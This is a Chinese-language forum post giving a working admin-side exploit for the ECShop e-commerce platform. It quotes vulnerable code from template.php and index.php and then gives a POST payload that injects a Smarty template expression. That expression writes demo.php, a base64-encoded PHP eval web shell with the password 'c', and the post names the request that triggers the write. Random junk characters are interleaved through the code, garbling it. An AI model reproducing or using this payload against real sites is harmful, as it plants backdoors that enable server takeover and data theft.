Ecshop后台getshell

admin

首先 ecshop用的是smarty 这样就可以通过它的fetch函数来执行模板
9 {+ v3 U& m/ K
" X! h9 ]$ J# }% B& e而模板里面可以执行他定义的php代码，这样只要可以写出模板 然后找到调用就可以拿到shell了
7 n* J& M' P" i" t但是ecshop似乎不支持{php}{/php}这个标签来执行php代码
+ \. v4 K( J3 ~7 [8 |admin/template.php

1 if ($_REQUEST['act'] == 'update_library')
! s& b3 W9 ?* E' k( j
, z  O. J: T; H( [; e2   
8 [: I! n* ^% L  s( ?
3 {

) n* ]) x# W8 n9 I+ x4     check_authz_json('library_manage');

5   
4 t4 \& x  i* g3 @' u8 m6 }% i
( V+ q+ p6 E6 N3 Z: [- [6     $html = stripslashes(json_str_iconv($_POST['html']));

, B! ?! m" C3 f  V7   

% U, z, D7 n" ^8 T* B6 J' }8     $lib_file = '../themes/' . $_CFG['template'] . '/library/' .$_POST['lib'] . '.lbi'; //模板文件
+ h  Q/ v4 z# ]: v
' o6 F/ p" k& H5 W5 g: q9   

10     $lib_file = str_replace("0xa", '', $lib_file); // 过滤 0xa 非法字符
# G* l! ^% O: L, Q2 G7 _
11   

12     $org_html = str_replace("\xEF\xBB\xBF", '',file_get_contents($lib_file));

13   
* N' q' q, h; F3 r$ Z$ N
14     if (@file_exists($lib_file) === true && @file_put_contents($lib_file,$html))//写出

15     {

0 e$ a( R0 D; r* [16         @file_put_contents('../temp/backup/library/' . $_CFG['template'] .'-' . $_POST['lib'] . '.lbi', $org_html);

17         make_json_result('', $_LANG['update_lib_success']);

18     }

& W2 O) L* z0 R6 @0 c- h6 ^: O19     else

20     {

% V) H$ w/ l4 A* s! t0 U8 C9 |. q21         make_json_error(sprintf($_LANG['update_lib_failed'], 'themes/' .$_CFG['template'] . '/library'));
5 v: [- v8 Q# @1 q
22     }
; R1 @7 t6 q9 x* n! C
23 }
) T# m5 U3 U2 `: q; l7 a
2 w' {$ K# }1 t那么找个比较方便调用了模板的文件
) n- r3 d/ ^8 e! `: y- Uindex.php

' ~' ]4 n# Q& [, X+ P  e* C1 if ($act == 'cat_rec')
5 @  u+ k# \9 q, }* S
: j6 y4 _4 o, O; L" |$ J2   
1 d" k6 v) i( w' g. a. j" m
0 N3 x% D+ @! M) ~7 Y* \3 {
( ]* E& C9 {: ^5 [
4   
8 ]( G# F4 R) J' Z( t/ m  J
5     $rec_array = array(1 => 'best', 2 => 'new', 3 => 'hot');

6   

7     $rec_type = !empty($_REQUEST['rec_type']) ?intval($_REQUEST['rec_type']) : '1';
$ A  _: T% M: t6 q' y" F
8 k: }  j% t2 \' J/ g8   
6 c: F4 m" F' p" a, y2 K9 A0 |
9     $cat_id = !empty($_REQUEST['cid']) ? intval($_REQUEST['cid']) : '0';

- y7 ?" F5 @% e  f10   
  @; k* Z4 v3 Q7 ?
) G' {3 U, o" u/ |11     include_once('includes/cls_json.php');

' q$ M' R, k! v* X12   
" d- s! n: m+ q6 Q( t
  \. l- R! t4 W' o' [13     $json = new JSON;
7 Z$ I. _! z& s0 E
3 U6 {" A+ m, p) s14   

15     $result   = array('error' => 0, 'content' => '', 'type' => $rec_type,'cat_id' => $cat_id);

16   
8 F2 b) g; t4 _$ M% e9 b. }6 M6 ?
17     $children = get_children($cat_id);
9 q4 H% h+ {/ o+ H
18   
( M! R3 c% ]% r+ Q
19     $smarty->assign($rec_array[$rec_type] . '_goods',      get_category_recommend_goods($rec_array[$rec_type], $children));    // 推荐商品

20   
( N/ P6 y& R" d0 N- k$ b
5 @* n% H) Q# L: J% Q, s21     $smarty->assign('cat_rec_sign', 1);
, N# y: K1 Y7 h3 ?
22   
* _4 l, a# v  L6 x0 M7 v, g8 W  [
% b9 S. y/ U, j. `& S- A23     $result['content'] = $smarty->fetch('library/recommend_' .$rec_array[$rec_type] . '.lbi');//使用了模板文件 该模板文件为recommend_best
" f, D. U5 \8 n2 p' _
4 r$ t- {+ K; H+ {" }24   

25         echo 'library/recommend_' . $rec_array[$rec_type] . '.lbi';

26   

+ Y" o% V) V+ Y" s+ s6 ]- O27         echo $rec_array[$rec_type];
2 Y7 G  w* K' d+ |) L6 d
; v7 |$ I  Q$ U6 y1 W28   
! @+ ~9 l7 ]5 S* K9 ], R4 j
$ a6 @0 m6 ^8 {) T2 b, e29     die($json->encode($result));
3 P, k  I% r2 l8 q1 v5 \
/ Y3 y9 J9 S: O8 }30   
5 i$ @! W+ H  ]: L" o5 Z
31 }

& G5 B% D. o8 a: u那么就有利用方法了
; C! e+ V5 R/ ]- j0 ^/ @9 Rpost包到http://localhost/ec/admin/template.php?act=update_library
6 k3 W2 ^" y# @9 k0 SPost内容：

0 j9 e) m9 v& t; w: L0 ~​
1 lib=recommend_best&html={iffputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}16086{/if}
7 O5 E: z4 g: h* a
1 h! j, i, [- F6 k* p然后访问http://localhost/ec/index.php?act=cat_rec
1 s. C: Y+ Y  `1 a- h
shel地址：http://localhost/ec/demo.php
' @, R+ @' ~* a密码c